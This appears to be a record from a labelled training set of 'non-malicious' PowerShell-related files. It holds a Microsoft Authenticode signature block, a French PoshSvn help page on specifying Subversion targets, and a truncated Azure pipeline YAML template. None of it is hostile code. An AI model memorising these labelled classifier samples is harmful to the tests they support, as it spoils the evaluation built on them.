b3NvZnQgQ29ycG9yYXRpb24wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB # AQCfdGddwIOnbRYUyg03O3iz19XXZPmuhEmW/5uyEN+8mgxl+HJGeLGBR8YButGV # LVK38RxcVcPYyFGQXcKcxgih4w4y4zJi3GvawLYHlsNExQwz+v0jgY/aejBS2EJY # oUhLVE+UzRihV8ooxoftsmKLb2xb7BoFS6UAo3Zz4afnOdqI7FGoi7g4vx/0MIdi # kwTn5N56TdIv3mwfkZCFmrsKpN0zR8HD8WYsvH3xKkG7u/xdqmhPPqMmnI2jOFw/ # /n2aL8W7i1Pasja8PnRXH/QaVH0M1nanL+LI9TsMb/enWfXOW65Gne5cqMN9Uofv # ENtdwwEmJ3bZrcI9u4LZAkujAgMBAAGjggGCMIIBfjAfBgNVHSUEGDAWBgorBgEE # AYI3TAgBBggrBgEFBQcDAzAdBgNVHQ4EFgQU6m4qAkpz4641iK2irF8eWsSBcBkw # VAYDVR0RBE0wS6RJMEcxLTArBgNVBAsTJE1pY3Jvc29mdCBJcmVsYW5kIE9wZXJh # dGlvbnMgTGltaXRlZDEWMBQGA1UEBRMNMjMwMDEyKzUwMjkyNjAfBgNVHSMEGDAW # gBRIbmTlUAXTgqoXNzcitW2oynUClTBUBgNVHR8ETTBLMEmgR6BFhkNodHRwOi8v # d3d3Lm1pY3Jvc29mdC5jb20vcGtpb3BzL2NybC9NaWNDb2RTaWdQQ0EyMDExXzIw # MTEtMDctMDguY3JsMGEGCCsGAQUFBwEBBFUwUzBRBggrBgEFBQcwAoZFaHR0cDov # L3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9jZXJ0cy9NaWNDb2RTaWdQQ0EyMDEx # XzIwMTEtMDctMDguY3J0MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQELBQADggIB # AFFo/6E4LX51IqFuoKvUsi80QytGI5ASQ9zsPpBa0z78hutiJd6w154JkcIx/f7r # EBK4NhD4DIFNfRiVdI7EacEs7OAS6QHF7Nt+eFRNOTtgHb9PExRy4EI/jnMwzQJV # NokTxu2WgHr/fBsWs6G9AcIgvHjWNN3qRSrhsgEdqHc0bRDUf8UILAdEZOMBvKLC # rmf+kJPEvPldgK7hFO/L9kmcVe67BnKejDKO73Sa56AJOhM7CkeATrJFxO9GLXos # oKvrwBvynxAg18W+pagTAkJefzneuWSmniTurPCUE2JnvW7DalvONDOtG01sIVAB # +ahO2wcUPa2Zm9AiDVBWTMz9XUoKMcvngi2oqbsDLhbK+pYrRUgRpNt0y1sxZsXO # raGRF8lM2cWvtEkV5UL+TQM1ppv5unDHkW8JS+QnfPbB8dZVRyRmMQ4aY/tx5x5+ # sX6semJ//FbiclSMxSI+zINu1jYerdUwuCi+P6p7SmQmClhDM+6Q+btE2FtpsU0W # +r6RdYFf/P+nK6j2otl9Nvr3tWLu+WXmz8MGM+18ynJ+lYbSmFWcAj7SYziAfT0s # IwlQRFkyC71tsIZUhBHtxPliGUu362lIO0Lpe0DOrg8lspnEWOkHnCT5JEnWCbzu # iVt8RX1IV07uIveNZuOBWLVCzWJjEGa+HhaEtavjy6i7MIIHejCCBWKgAwIBAgIK # YQ6Q0gAAAAAAAzANBgkqhkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNV # BAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jv # c29mdCBDb3Jwb3JhdGlvbjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlm # aWNhdGUgQXV0aG9yaXR5IDIwMTEwHhcNMTEwNzA4MjA1OTA5WhcNMjYwNzA4MjEw # OTA5WjB+MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UE # BxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSgwJgYD # VQQDEx9NaWNyb3NvZnQgQ29kZSBTaWduaW5nIFBDQSAyMDExMIICIjANBgkqhkiG # 9w0BAQEFAAOCAg8AMIICCgKCAgEAq/D6chAcLq3YbqqCEE00uvK2WCGfQhsqa+la # UKq4BjgaBEm6f8MMHt03a8YS2AvwOMKZBrDIOdUBFDFC04kNeWSHfpRgJGyvnkmc # 6Whe0t+bU7IKLMOv2akrrnoJr9eWWcpgGgXpZnboMlImEi/nqwhQz7NEt13YxC4D # dato88tt8zpcoRb0RrrgOGSsbmQ1eKagYw8t00CT+OPeBw3VXHmlSSnnDb6gE3e+ # lD3v++MrWhAfTVYoonpy4BI6t0le2O3tQ5GD2Xuye4Yb2T6xjF3oiU+EGvKhL1nk # kDstrjNYxbc+/jLTswM9sbKvkjh+0p2ALPVOVpEhNSXDOW5kf1O6nA+tGSOEy/S6 # A4aN91/w0FK/jJSHvMAhdCVfGCi2zCcoOCWYOUo2z3yxkq4cI6epZuxhH2rhKEmd # X4jiJV3TIUs+UsS1Vz8kA/DRelsv1SPjcF0PUUZ3s/gA4bysAoJf28AVs70b1FVL # 5zmhD+kjSbwYuER8ReTBw3J64HLnJN+/RpnF78IcV9uDjexNSTCnq47f7Fufr/zd # sGbiwZeBe+3W7UvnSSmnEyimp31ngOaKYnhfsi+E11ecXL93KCjx7W3DKI8sj0A3 # T8HhhUSJxAlMxdSlQy90lfdu+HggWCwTXWCVmj5PM4TasIgX3p5O9JawvEagbJjS # 4NaIjAsCAwEAAaOCAe0wggHpMBAGCSsGAQQBgjcVAQQDAgEAMB0GA1UdDgQWBBRI # bmTlUAXTgqoXNzcitW2oynUClTAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTAL # BgNVHQ8EBAMCAYYwDwYDVR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBRyLToCMZBD # uRQFTuHqp8cx0SOJNDBaBgNVHR8EUzBRME+gTaBLhklodHRwOi8vY3JsLm1pY3Jv # c29mdC5jb20vcGtpL2NybC9wcm9kdWN0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFf # MDNfMjIuY3JsMF4GCCsGAQUFBwEBBFIwUDBOBggrBgEFBQcwAoZCaHR0cDovL3d3 # dy5taWNyb3NvZnQuY29tL3BraS9jZXJ0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFf # MDNfMjIuY3J0MIGfBgNVHSAEgZcwgZQwgZEGCSsGAQQBgjcuAzCBgzA/BggrBgEF # BQcCARYzaHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9kb2NzL3ByaW1h # cnljcHMuaHRtMEAGCCsGAQUFBwICMDQeMiAdAEwAZQBnAGEAbABfAHAAbwBsAGkA # YwB5AF8AcwB0AGEAdABlAG0AZQBuAHQALiAdMA0GCSqGSIb3DQEBCwUAA4ICAQBn # 8oalmOBUeRou09h0ZyKbC5YR4WOSmUKWfdJ5DJDBZV8uLD74w3LRbYP+vj/oCso7 # v0epo/Np22O/IjWll11lhJB9i0ZQVdgMknzSGksc8zxCi1LQsP1r4z4HLimb5j0b # pdS1HXeUOeLpZMlEPXh6I/MTfaaQdION9MsmAkYqwooQu6SpBQyb7Wj6aC6VoCo/ # KmtYSWMfCWluWpiW5IP0wI/zRive/DvQvTXvbiWu5a8n7dDd8w6vmSiXmE0OPQvy # CInWH8MyGOLwxS3OW560STkKxgrCxq2u5bLZ2xWIUUVYODJxJxp/sfQn+N4sOiBp # mLJZiWhub6e3dMNABQamASooPoI/E01mC8CzTfXhj38cbxV9Rad25UAqZaPDXVJi # hsMdYzaXht/a8/jyFqGaJ+HNpZfQ7l1jQeNbB5yHPgZ3BtEGsXUfFL5hYbXw3MYb # BL7fQccOKO7eZS/sl/ahXJbYANahRr1Z85elCUtIEJmAH9AAKcWxm6U/RXceNcbS # oqKfenoi+kiVH6v7RyOA9Z74v2u3S5fi63V4GuzqN5l5GEv/1rMjaHXmr/r8i+sL # gOppO6/8MO0ETI7f33VtY5E90Z1WTk+/gFcioXgRMiF670EKsT/7qMykXcGhiJtX # cVZOSEXAQsmbdlsKgEhr/Xmfwb1tbWrJUnMTDXpQzTGCGgowghoGAgEBMIGVMH4x # CzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRt # b25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01p # Y3Jvc29mdCBDb2RlIFNpZ25pbmcgUENBIDIwMTECEzMAAAQDvdWVXQ87GK0AAAAA # BAMwDQYJYIZIAWUDBAIBBQCgga4wGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQw # HAYKKwYBBAGCNwIBCzEOMAwGCisGAQQBgjcCARUwLwYJKoZIhvcNAQkEMSIEIIQA # 2rAj28cmDpcZvuTQhxuVPxRDgBUojURy9PPqVlFsMEIGCisGAQQBgjcCAQwxNDAy # oBSAEgBNAGkAYwByAG8AcwBvAGYAdKEagBhodHRwOi8vd3d3Lm1pY3Jvc29mdC5j # b20wDQYJKoZIhvcNAQEBBQAEggEAhinhxpmfZWWl9Jt5ApySm7GytbmgW2lGVJxD # peYXmFTTCxnj1CVmRec7lPYGzz8/5t6J0FF+Q4y+YRkB9s5LBEEvSkWzgT2I+TTT # wyXqyf80TUuktGJuky1ESj4Sp6PK36cv4oNqCn4pQoPDlAul0SLDIsdElpVoMwQb # utjq0XS8KLym62jx8S6tOPuXQSSOr6V30T8J15wwvul5ME6vZMNZUc+Du0IGCX78 # 1aBM0vw/BMKOhnxjFxgiBBwrfVZpnJRsvZ39R0s4vfxCDN5giDr5wkqe3gnmzfCc # 9t2Qv6XdXZg4VN73Aycug85+paSHuMkOy9O4qwdUmLA0lRnq/6GCF5QwgheQBgor # BgEEAYI3AwMBMYIXgDCCF3wGCSqGSIb3DQEHAqCCF20wghdpAgEDMQ8wDQYJYIZI # AWUDBAIBBQAwggFSBgsqhkiG9w0BCRABBKCCAUEEggE9MIIBOQIBAQYKKwYBBAGE # WQoDATAxMA0GCWCGSAFlAwQCAQUABCBqi+FNf8GeccTcvReu3LszbncNMhF7HP83 # C5vGeUvwWgIGZxqBxlgYGBMyMDI0MTAyODExNDA0My4xNTdaMASAAgH0oIHRpIHO # MIHLMQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH # UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSUwIwYDVQQL # ExxNaWNyb3NvZnQgQW1lcmljYSBPcGVyYXRpb25zMScwJQYDVQQLEx5uU2hpZWxk # IFRTUyBFU046REMwMC0wNUUwLUQ5NDcxJTAjBgNVBAMTHE1pY3Jvc29mdCBUaW1l # LVN0YW1wIFNlcnZpY2WgghHqMIIHIDCCBQigAwIBAgITMwAAAehQsIDPK3KZTQAB # AAAB6DANBgkqhkiG9w0BAQsFADB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2Fz # aGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENv # cnBvcmF0aW9uMSYwJAYDVQQDEx1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAx # MDAeFw0yMzEyMDYxODQ1MjJaFw0yNTAzMDUxODQ1MjJaMIHLMQswCQYDVQQGEwJV # UzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UE # ChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSUwIwYDVQQLExxNaWNyb3NvZnQgQW1l # cmljYSBPcGVyYXRpb25zMScwJQYDVQQLEx5uU2hpZWxkIFRTUyBFU046REMwMC0w # NUUwLUQ5NDcxJTAjBgNVBAMTHE1pY3Jvc29mdCBUaW1lLVN0YW1wIFNlcnZpY2Uw # ggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoICAQDhQXdE0WzXG7wzeC9SGdH6 # eVwdGlF6YgpU7weOFBkpW9yuEmJSDE1ADBx/0DTuRBaplSD8CR1QqyQmxRDD/Cdv # DyeZFAcZ6l2+nlMssmZyC8TPt1GTWAUt3GXUU6g0F0tIrFNLgofCjOvm3G0j482V # utKS4wZT6bNVnBVsChr2AjmVbGDN/6Qs/EqakL5cwpGel1te7UO13dUwaPjOy0Wi # 1qYNmR8i7T1luj2JdFdfZhMPyqyq/NDnZuONSbj8FM5xKBoar12ragC8/1CXaL1O # MXBwGaRoJTYtksi9njuq4wDkcAwitCZ5BtQ2NqPZ0lLiQB7O10Bm9zpHWn9x1/Hm # dAn4koMWKUDwH5sd/zDu4vi887FWxm54kkWNvk8FeQ7ZZ0Q5gqGKW4g6revV2IdA # xBobWdorqwvzqL70WdsgDU/P5c0L8vYIskUJZedCGHM2hHIsNRyw9EFoSolDM+yC # edkz69787s8nIp55icLfDoKw5hak5G6MWF6d71tcNzV9+v9RQKMa6Uwfyquredd5 # sqXWCXv++hek4A15WybIc6ufT0ilazKYZvDvoaswgjP0SeLW7mvmcw0FELzF1/uW # aXElLHOXIlieKF2i/YzQ6U50K9dbhnMaDcJSsG0hXLRTy/LQbsOD0hw7FuK0nmzo # tSx/5fo9g7fCzoFjk3tDEwIDAQABo4IBSTCCAUUwHQYDVR0OBBYEFPo5W8o980kM # fRVQba6T34HwelLaMB8GA1UdIwQYMBaAFJ+nFV0AXmJdg/Tl0mWnG1M1GelyMF8G # A1UdHwRYMFYwVKBSoFCGTmh0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9wa2lvcHMv # Y3JsL01pY3Jvc29mdCUyMFRpbWUtU3RhbXAlMjBQQ0ElMjAyMDEwKDEpLmNybDBs # BggrBgEFBQcBAQRgMF4wXAYIKwYBBQUHMAKGUGh0dHA6Ly93d3cubWljcm9zb2Z0 # LmNvbS9wa2lvcHMvY2VydHMvTWljcm9zb2Z0JTIwVGltZS1TdGFtcCUyMFBDQSUy # MDIwMTAoMSkuY3J0MAwGA1UdEwEB/wQCMAAwFgYDVR0lAQH/BAwwCgYIKwYBBQUH # AwgwDgYDVR0PAQH/BAQDAgeAMA0GCSqGSIb3DQEBCwUAA4ICAQCWfcJm2rwXtPi7 # 4km6PKAkni9+BWotq+QtDGgeT5F3ro7PsIUNKRkUytuGqI8thL3Jcrb03x6DOppY # JEA+pb6o2qPjFddO1TLqvSXrYm+OgCLL+7+3FmRmfkRu8rHvprab0O19wDbukgO8 # I5Oi1RegMJl8t5k/UtE0Wb3zAlOHnCjLGSzP/Do3ptwhXokk02IvD7SZEBbPboGb # tw4LCHsT2pFakpGOBh+ISUMXBf835CuVNfddwxmyGvNSzyEyEk5h1Vh7tpwP7z7r # J+HsiP4sdqBjj6Avopuf4rxUAfrEbV6aj8twFs7WVHNiIgrHNna/55kyrAG9Yt19 # CPvkUwxYK0uZvPl2WC39nfc0jOTjivC7s/IUozE4tfy3JNkyQ1cNtvZftiX3j5Dt # +eLOeuGDjvhJvYMIEkpkV68XLNH7+ZBfYa+PmfRYaoFFHCJKEoRSZ3PbDJPBiEhZ # 9yuxMddoMMQ19Tkyftot6Ez0XhSmwjYBq39DvBFWhlyDGBhrU3GteDWiVd9YGSB2 # WnxuFMy5fbAK6o8PWz8QRMiptXHK3HDBr2wWWEcrrgcTuHZIJTqepNoYlx9VRFvj # /vCXaAFcmkW1nk7VE+owaXr5RJjryDq9ubkyDq1mdrF/geaRALXcNZbfNXIkhXzX # A6a8CiamcQW/DgmLJpiVQNriZYCHIDCCB3EwggVZoAMCAQICEzMAAAAVxedrngKb # SZkAAAAAABUwDQYJKoZIhvcNAQELBQAwgYgxCzAJBgNVBAYTAlVTMRMwEQYDVQQI # EwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3Nv # ZnQgQ29ycG9yYXRpb24xMjAwBgNVBAMTKU1pY3Jvc29mdCBSb290IENlcnRpZmlj # YXRlIEF1dGhvcml0eSAyMDEwMB4XDTIxMDkzMDE4MjIyNVoXDTMwMDkzMDE4MzIy # NVowfDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcT # B1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UE # AxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAgUENBIDIwMTAwggIiMA0GCSqGSIb3DQEB # AQUAA4ICDwAwggIKAoICAQDk4aZM57RyIQt5osvXJHm9DtWC0/3unAcH0qlsTnXI # yjVX9gF/bErg4r25PhdgM/9cT8dm95VTcVrifkpa/rg2Z4VGIwy1jRPPdzLAEBjo # YH1qUoNEt6aORmsHFPPFdvWGUNzBRMhxXFExN6AKOG6N7dcP2CZTfDlhAnrEqv1y # aa8dq6z2Nr41JmTamDu6GnszrYBbfowQHJ1S/rboYiXcag/PXfT+jlPP1uyFVk3v # 3byNpOORj7I5LFGc6XBpDco2LXCOMcg1KL3jtIckw+DJj361VI/c+gVVmG1oO5pG # ve2krnopN6zL64NF50ZuyjLVwIYwXE8s4mKyzbnijYjklqwBSru+cakXW2dg3viS # kR4dPf0gz3N9QZpGdc3EXzTdEonW/aUgfX782Z5F37ZyL9t9X4C626p+Nuw2TPYr # bqgSUei/BQOj0XOmTTd0lBw0gg/wEPK3Rxjtp+iZfD9M269ewvPV2HM9Q07BMzlM # jgK8QmguEOqEUUbi0b1qGFphAXPKZ6Je1yh2AuIzGHLXpyDwwvoSCtdjbwzJNmSL # W6CmgyFdXzB0kZSU2LlQ+QuJYfM2BjUYhEfb3BvR/bLUHMVr9lxSUV0S2yW6r1AF # emzFER1y7435UsSFF5PAPBXbGjfHCBUYP3irRbb1Hode2o+eFnJpxq57t7c+auIu # rQIDAQABo4IB3TCCAdkwEgYJKwYBBAGCNxUBBAUCAwEAATAjBgkrBgEEAYI3FQIE # FgQUKqdS/mTEmr6CkTxGNSnPEP8vBO4wHQYDVR0OBBYEFJ+nFV0AXmJdg/Tl0mWn # G1M1GelyMFwGA1UdIARVMFMwUQYMKwYBBAGCN0yDfQEBMEEwPwYIKwYBBQUHAgEW # M2h0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9wa2lvcHMvRG9jcy9SZXBvc2l0b3J5 # Lmh0bTATBgNVHSUEDDAKBggrBgEFBQcDCDAZBgkrBgEEAYI3FAIEDB4KAFMAdQBi # AEMAQTALBgNVHQ8EBAMCAYYwDwYDVR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBTV # 9lbLj+iiXGJo0T2UkFvXzpoYxDBWBgNVHR8ETzBNMEugSaBHhkVodHRwOi8vY3Js # Lm1pY3Jvc29mdC5jb20vcGtpL2NybC9wcm9kdWN0cy9NaWNSb29DZXJBdXRfMjAx # MC0wNi0yMy5jcmwwWgYIKwYBBQUHAQEETjBMMEoGCCsGAQUFBzAChj5odHRwOi8v # d3d3Lm1pY3Jvc29mdC5jb20vcGtpL2NlcnRzL01pY1Jvb0NlckF1dF8yMDEwLTA2 # LTIzLmNydDANBgkqhkiG9w0BAQsFAAOCAgEAnVV9/Cqt4SwfZwExJFvhnnJL/Klv # 6lwUtj5OR2R4sQaTlz0xM7U518JxNj/aZGx80HU5bbsPMeTCj/ts0aGUGCLu6WZn # OlNN3Zi6th542DYunKmCVgADsAW+iehp4LoJ7nvfam++Kctu2D9IdQHZGN5tggz1 # bSNU5HhTdSRXud2f8449xvNo32X2pFaq95W2KFUn0CS9QKC/GbYSEhFdPSfgQJY4 # rPf5KYnDvBewVIVCs/wMnosZiefwC2qBwoEZQhlSdYo2wh3DYXMuLGt7bj8sCXgU # 6ZGyqVvfSaN0DLzskYDSPeZKPmY7T7uG+jIa2Zb0j/aRAfbOxnT99kxybxCrdTDF # NLB62FD+CljdQDzHVG2dY3RILLFORy3BFARxv2T5JL5zbcqOCb2zAVdJVGTZc9d/ # HltEAY5aGZFrDZ+kKNxnGSgkujhLmm77IVRrakURR6nxt67I6IleT53S0Ex2tVdU # CbFpAUR+fKFhbHP+CrvsQWY9af3LwUFJfn6Tvsv4O+S3Fb+0zj6lMVGEvL8CwYKi # excdFYmNcP7ntdAoGokLjzbaukz5m/8K6TT4JDVnK+ANuOaMmdbhIurwJ0I9JZTm # dHRbatGePu1+oDEzfbzL6Xu/OHBE0ZDxyKs6ijoIYn/ZcGNTTY3ugm2lBRDBcQZq # ELQdVTNYs6FwZvKhggNNMIICNQIBATCB+aGB0aSBzjCByzELMAkGA1UEBhMCVVMx # EzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoT # FU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjElMCMGA1UECxMcTWljcm9zb2Z0IEFtZXJp # Y2EgT3BlcmF0aW9uczEnMCUGA1UECxMeblNoaWVsZCBUU1MgRVNOOkRDMDAtMDVF # MC1EOTQ3MSUwIwYDVQQDExxNaWNyb3NvZnQgVGltZS1TdGFtcCBTZXJ2aWNloiMK # AQEwBwYFKw4DAhoDFQCMJG4vg0juMOVn2BuKACUvP80FuqCBgzCBgKR+MHwxCzAJ # BgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25k # MR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xJjAkBgNVBAMTHU1pY3Jv # c29mdCBUaW1lLVN0YW1wIFBDQSAyMDEwMA0GCSqGSIb3DQEBCwUAAgUA6smdRzAi # GA8yMDI0MTAyODA1MTkwM1oYDzIwMjQxMDI5MDUxOTAzWjB0MDoGCisGAQQBhFkK # BAExLDAqMAoCBQDqyZ1HAgEAMAcCAQACAh8PMAcCAQACAhQSMAoCBQDqyu7HAgEA # MDYGCisGAQQBhFkKBAIxKDAmMAwGCisGAQQBhFkKAwKgCjAIAgEAAgMHoSChCjAI # AgEAAgMBhqAwDQYJKoZIhvcNAQELBQADggEBAMgszoIDg2o9tGcYXJy12HtzVNFW # M2U6+uXp/lZFN9GfKyEAtrE+WzK6IRGIcVwMQ88Li4P2eAY/JRqLae0FqcCpM7fV # KJCew6OG7JkRgr5zDklXZmeDXlSCV3g/wV51WFpAIuTVjd9LCV+YKpMLsnI+0mnr # KlnQGDVkrOH7GF9HYG+2JKF6eLr7JTYAwZCTpXYkfuWY4z3EKTTola7G9slIo7n5 # dTdvC9qaCYqt+eSrC5+s3smEjVTxn6EEPDjDmnaAJfLiZAsBGo6VEBm6tEV77qnm # V9xpIrErypW2LN6/e4lrLQJO3X5elf7PvUwi0ogdjF4wv5DRTrY4TQMJ+oMxggQN # MIIECQIBATCBkzB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQ # MA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9u # MSYwJAYDVQQDEx1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMAITMwAAAehQ # sIDPK3KZTQABAAAB6DANBglghkgBZQMEAgEFAKCCAUowGgYJKoZIhvcNAQkDMQ0G # CyqGSIb3DQEJEAEEMC8GCSqGSIb3DQEJBDEiBCAJeoUXxIVF/FZLlXRFVyrZO3/I # J7a2oVUZEszquqpJPjCB+gYLKoZIhvcNAQkQAi8xgeowgecwgeQwgb0EICrS2sTV # AoQggkHR59pNqige0xfJT2J3U8W1Sc8H+OsdMIGYMIGApH4wfDELMAkGA1UEBhMC # VVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNV # BAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRp # bWUtU3RhbXAgUENBIDIwMTACEzMAAAHoULCAzytymU0AAQAAAegwIgQgLUsjW5We # q4WPeaZKqGRCLipnTqgXs5A+dsy2nUeh3x4wDQYJKoZIhvcNAQELBQAEggIAqXlK # N+6cyPt0zFCuofrP5mlHwdfNY1wAJFLj+OwVjkn8iZBj9LfLryCQBLcyhN+98p8U # v++GpdVM7mOpd8NhRBzDrnqXwicxg0V7mN1rMt8imcdmlK9FAH/GZyCnFVWL+z3+ # SK40P3ySt5J64Z1InzAwWkjl4wznniAYKDdSMbWeVm8WCu+j/DBnrxk7oEXQuG6p # Sht6q9yOxXaxo4eC7HhGD/WI8E+z0eqC0QHXTfnCJivP8i6O3PrrtD8XENturjsb # pk+rDCb2pSlKoS0+L8PjBfyIXbeO3FOOZad1CFsGHWLeuwvrjYwo0dQur38VOtsb # DsFd34t+rWZzNdSfio88NRc5Mgqq11nQ99Wnoq6/8lYHduVhDY+AFz9Wk2cAVhn8 # m2/avMN5r0vJhabgtx+HX+d/TzzRj/RD8bJ0iYMGSoeWRmiWfASwggqNwYbPQMlu # uMFxowWvIXdAZ22+nEV9eEt4T1v07t5dkZmCalrFZc863vi4QDsX4VaEbhAL/A6U # S4fTeze1ssnox1rRkJTpH7owx8RUWkHJ5FbNuDSFrEHDl1D4IaaqPItqZ1pclDNv # LCNXBj+9tCzRzsWo9l+rJGkNmxKCKx/MpuhdKspauuK1SYqhbRQvPYZpZ+QS71aM # D7ymuQAn9mlVAIxknY1AdoKPMDfPDhAxoMsPk7A= # SIG # End signature block
combined_dataset/train/non-malicious/sample_24_68.ps1
sample_24_68.ps1
TOPIC about_poshsvntarget Short description Description de la façon de spécifier la cible d'une cmdlet. Long description Certaines opérations Subversion prennent en charge la spécification d'un chemin local vers une copie de travail ou d'une URL distante vers un dépôt en tant que cible. Vous pouvez spécifier la cible de l'opération en définissant le paramètre `-Target` sur soit un chemin ou une URL. Cependant, si vous préférez indiquer directement s'il s'agit d'une URL ou d'un chemin, utilisez la cmdlet New-SvnTarget et spécifiez la cible via les paramètres `-Url` ou `-Path` respectivement. SPÉCIFICATION DE LA CIBLE VIA LE PARAMÈTRE `-TARGET` Cette méthode de spécification de la cible est optimale pour une utilisation de base de Subversion. Vous pouvez passer soit un chemin ou une URL au paramètre `-Target`, que PoshSvn interprétera en conséquence. Les exemples suivants récupèrent `svn-info` depuis le dépôt distant et la copie de travail : svn-info -Target https://svn.apache.org/repos/asf/serf/trunk svn-info -Target .\chemin\vers\wc Cependant, vous n'avez pas besoin d'écrire `-Target` avant de spécifier la cible, car il accepte la valeur des arguments restants. C'est pourquoi cela répète presque le comportement de l'interface en ligne de commande de Subversion : svn-info https://svn.apache.org/repos/asf/serf/trunk svn-info .\chemin\vers\wc Dans certaines cmdlets, si aucune cible n'est spécifiée, PoshSvn utilisera par défaut le répertoire actuel. Cela signifie que l'exemple suivant récupérera `svn-info` à propos de la copie de travail située à `C:\chemin\vers\wc` : cd C:\chemin\vers\wc svn-info SPÉCIFICATION DE LA CIBLE EN INDIQUANT DIRECTEMENT SON TYPE Si vous écrivez un script, vous pouvez spécifier explicitement si la cible est une URL ou un chemin. Cette approche est optimale pour les scripts car elle garantit la lisibilité, la compréhension et aide à éviter les erreurs causées par une détection incorrecte du type de cible : svn-info (New-SvnTarget -Url https://svn.apache.org/repos/asf/serf/trunk) svn-info (New-SvnTarget -Path .\chemin\vers\wc) Si vous préférez, vous pouvez utiliser une variable pour la cible de la cmdlet. Par exemple : # Créer la cible $cible = (New-SvnTarget -Url https://svn.apache.org/repos/asf/serf/trunk) # Afficher la cible Write-Output $cible # Appeler svn-info svn-info -Target $cible Si une cible avec un type différent est spécifiée, cela entraînera une erreur : svn-info (New-SvnTarget -Path https://svn.apache.org/repos/asf/serf/trunk) # Erreur svn-info (New-SvnTarget -Url .\chemin\vers\wc) # Erreur De plus, vous pouvez utiliser la variable `$PSScriptRoot` si votre copie de travail est située près du script. Cette variable automatique fournit le chemin vers le répertoire contenant le script. svn-info (New-SvnTarget -Path $PSScriptRoot\chemin\vers\wc)
combined_dataset/train/non-malicious/sample_57_68.ps1
sample_57_68.ps1
parameters: configuration: 'Debug' # Optional: condition for the job to run condition: '' # Optional: 'true' if future jobs should run even if this job fails continueOnError: false # Optional: dependencies of the job dependsOn: '' # Optional: Include PublishBuildArtifacts task enablePublishBuildArtifacts: false # Optional: A defined YAML pool - https://docs.microsoft.com/en-us/azure/devops/pipelines/yaml-schema?view=vsts&tabs=schema#pool pool: {} # Optional: should run as a public build even in the internal project # if 'true', the build won't run any of the internal only steps, even if it is running in non-public projects. runAsPublic: false # Optional: whether the build's artifacts will be published using release pipelines or direct feed publishing publishUsingPipelines: false # Optional: whether the build's artifacts will be published using release pipelines or direct feed publishing publishAssetsImmediately: false artifactsPublishingAdditionalParameters: '' signingValidationAdditionalParameters: '' jobs: - job: Asset_Registry_Publish dependsOn: ${{ parameters.dependsOn }} timeoutInMinutes: 150 ${{ if eq(parameters.publishAssetsImmediately, 'true') }}: displayName: Publish Assets ${{ else }}: displayName: Publish to Build Asset Registry variables: - template: /eng/common/templates-official/variables/pool-providers.yml - ${{ if and(eq(parameters.runAsPublic, 'false'), ne(variables['System.TeamProject'], 'public'), notin(variables['Build.Reason'], 'PullRequest')) }}: - group: Publish-Build-Assets - group: AzureDevOps-Artifact-Feeds-Pats - name: runCodesignValidationInjection value: false - ${{ if eq(parameters.publishAssetsImmediately, 'true') }}: - template: /eng/common/templates-official/post-build/common-variables.yml pool: # We don't use the collection uri here because it might vary (.visualstudio.com vs. dev.azure.com) ${{ if eq(variables['System.TeamProject'], 'DevDiv') }}: name: AzurePipelines-EO image: 1ESPT-Windows2022 demands: Cmd os: windows # If it's not devdiv, it's dnceng ${{ if ne(variables['System.TeamProject'], 'DevDiv') }}: name: NetCore1ESPool-Publishing-Internal image: windows.vs2019.amd64 os: windows steps: - ${{ if and(eq(parameters.runAsPublic, 'false'), 